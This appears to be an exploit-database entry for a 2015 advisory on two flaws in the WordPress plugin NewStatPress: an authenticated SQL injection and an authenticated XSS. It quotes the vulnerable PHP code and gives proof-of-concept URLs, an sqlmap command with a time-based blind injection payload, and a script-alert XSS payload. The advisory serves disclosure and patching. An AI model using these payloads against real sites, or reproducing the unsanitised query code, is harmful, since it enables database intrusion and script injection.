Multiple vulnerabilities in WordPress plugin "NewStatPress"

vendor:

NewStatPress

by:

Adrián M. F.

7.5

CVSS

HIGH

Authenticated SQLi, Authenticated XSS

89, 79

CWE

Product Name: NewStatPress

Affected Version From: 2000.9.8

Affected Version To: 2000.9.9

Patch Exists: YES

Related CWE: CVE-2015-4062, CVE-2015-4063

CPE: a:wordpress:newstatpress

Metasploit:

Other Scripts:

Tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm

CVSS Metrics: CVSS:2.0/AV:N/AC:M/Au:S/C:N/I:P/A:N

Nuclei References: https://packetstormsecurity.com/files/132038/, https://wordpress.org/plugins/newstatpress/, http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html, https://nvd.nist.gov/vuln/detail/CVE-2015-4063, https://wordpress.org/plugins/newstatpress/changelog/

Nuclei Metadata: {'max-request': 2, 'verified': True, 'framework': 'wordpress', 'vendor': 'newstatpress_project', 'product': 'newstatpress'}

Platforms Tested:

2015

Multiple vulnerabilities in WordPress plugin “NewStatPress”

The plugin "NewStatPress" in WordPress is vulnerable to an authenticated SQL injection vulnerability (CVE-2015-4062) and an authenticated XSS vulnerability (CVE-2015-4063). The SQL injection vulnerability can be exploited by an authenticated user by manipulating the "where1" parameter in the "admin.php" page. The XSS vulnerability can also be exploited by an authenticated user by manipulating the "where1" parameter in the same page.

Mitigation:

Update to version 0.9.9 of the plugin.

Source

Exploit-DB raw data:

# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063

 Vulnerabilities (2)
=====================

(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------

* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
    }
}
+++++++++++++++++++++++++++++++++++++++++

* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search

SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++


(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------

includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++

* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search


 Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.